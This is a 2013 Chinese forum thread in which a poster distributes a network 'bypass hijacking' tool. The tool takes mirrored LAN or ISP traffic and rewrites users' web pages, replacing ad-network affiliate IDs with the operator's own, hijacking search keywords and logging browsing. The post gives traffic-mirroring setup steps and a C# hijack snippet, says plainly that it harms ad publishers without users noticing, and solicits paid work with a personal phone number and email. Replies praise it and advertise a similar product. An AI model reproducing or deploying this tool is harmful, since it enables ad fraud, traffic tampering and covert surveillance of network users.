旁路劫持程序（非ROS版、内网预览版）[网页内容劫持替换，Url劫持，各种广告联盟劫持]

sone

hijackingServer.zip (95.43 KB, 下载次数: 635)

2013-6-5 03:28 上传

点击文件名下载附件

需要.NET2.0！



只能在Windows 2003、Windows 2008系统上运行，非服务器系统无法运行。
将config.ini的SnifferListenIP配置键值改为本机IP。

系统可以完全不依靠routeros！！！可用于没有RouterOS环境的网络，只要交换机有镜像、分光功能或者数据包能到达服务器就行！！！
可用于跨网际环境，可用于城域网和骨干劫持。

如果是交换机镜像流量，直接镜像到这台服务器就行了。

如果是ros（ROS Sniffer性能底下，不建议使用），在ROS上使用tzsp协议镜像流量，就是Packet Sniffer的那个功能。如果不会看下面的。

在Winbox里面找到Tool->Packet Sniffer。点击第一个标签（Packet），点击Settings，选择第一个标签（General）在Interface里面找到选择内网的网卡，如果有多个内网网卡就选择all。然后点击第二个标签（Streaming），将两个复选框都选中，然后在Server：里面填写上服务器的IP，就是config.ini中SnifferListenIP值。然后Apply，然后Start。



之后，在这个内网下面的任何机器访问任何网页都会被添加?&silmoon这个参数看到了没？

hijackingServer.exe是所有都被追加了?&silmoon参数的。
hijackingServer2.exe是所有都被直接劫持某些文字的！
hijackingServer3.exe是百度搜索silmoon的时候才会被劫持的演示

三个程序每次只可以开一个，大家可以挨个打开看一下。谢谢围观。

这是一个演示版本，这是旁路劫持版本的劫持，不影响网络性能，就算程序死了也没事儿，死了最多就是无法劫持了，只是需要镜像一份流量给服务器，如果是高版本的ros可以只把tcp 80 上行流量镜像给服务器。
理论上可以做任何劫持，包括替换百度联盟号“tn=”，替换淘宝客pid，替换谷歌广告发布商ID，或者劫持百度搜索的某些关键字，更改各种广告框架，哈哈，或者记录任何浏览日志记录。

和老大的东西不一样在于，我这个不是加广告，而是替换所有已有网页上的各种广告，把广告的id和帐号都替换成自己的！！！做到用户神不知鬼不觉，不影响网页样式，不影响用户体验，只是侵害了网站广告发布商

如有需求联系我。接受技术合作。

补充内容 (2014-4-14 01:59):
有很多人问我联系方式，邮箱：sone(a)silmoon.com

补充内容 (2014-4-14 02:00):
也可以短信联系我：15650112341
邮箱：sone(a)silmoon.com

打酱油

老大会找你算账的。

fyfal

明显抢生意啊 哈哈

fuzhend

技术活  值得顶顶

luokaichuang

碉堡了，这个东西如果真如楼主所说。价值不低

puding

这个真心要顶一下。

9939781

直接用ROS就可以做到精确URL跳转了。包括替换百度联盟号“tn=”，替换淘宝客pid，替换谷歌广告发布商ID
只是网页内容替换光靠ROS无法完成。

sone

9939781 发表于 2013-6-5 15:27

                               
登录/注册后可看大图

直接用ROS就可以做到精确URL跳转了。包括替换百度联盟号“tn=”，替换淘宝客pid，替换谷歌广告发布商ID
只 ...

网页内容理论上也可以做到替换，不过只针对无用户会话的页面，主要是判断host和url这部完全是自己用代码写的，可控性更高。

        public void HijackEntry(byte[] buffer, int len, string host, string url)
        {
            if (url.Contains("wd=silmoon"))
            {
                Console.ForegroundColor = ConsoleColor.Red;

                Console.WriteLine("http://" + host + url);
                callHijack(buffer, len, host, url);
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("http://" + host + url);
            }
        }

981398

技术活，要力顶
-
老大会找你算账的
不知道会不会删帖！

qile

9939781 发表于 2013-6-5 15:27

                               
登录/注册后可看大图

直接用ROS就可以做到精确URL跳转了。包括替换百度联盟号“tn=”，替换淘宝客pid，替换谷歌广告发布商ID
只 ...

这个只能实现，能否举例说明

9939781

qile 发表于 2013-6-6 22:52

                               
登录/注册后可看大图

这个只能实现，能否举例说明

成品说明一切
http://www.cat-home.org/?action=show&id=122

qile

9939781 发表于 2013-6-6 22:56

                               
登录/注册后可看大图

成品说明一切
http://www.cat-home.org/?action=show&id=122

你那个 能实现替换淘宝客代码，百度联盟代码吗？

9939781

qile 发表于 2013-6-7 09:12
你那个 能实现替换淘宝客代码，百度联盟代码吗？

只要是基于url的都可以。不过我只搞导航和搜索增值，其他增值不搞。产品内容已经介绍得很清楚了。什么百度，搜狗 tao123 都可以实现定向只劫持有增值id的连接。也可以劫持不带增值id的导航搜索。

youshu

这个相当可以啊！

duyang12003

现在的广告做的很给力了，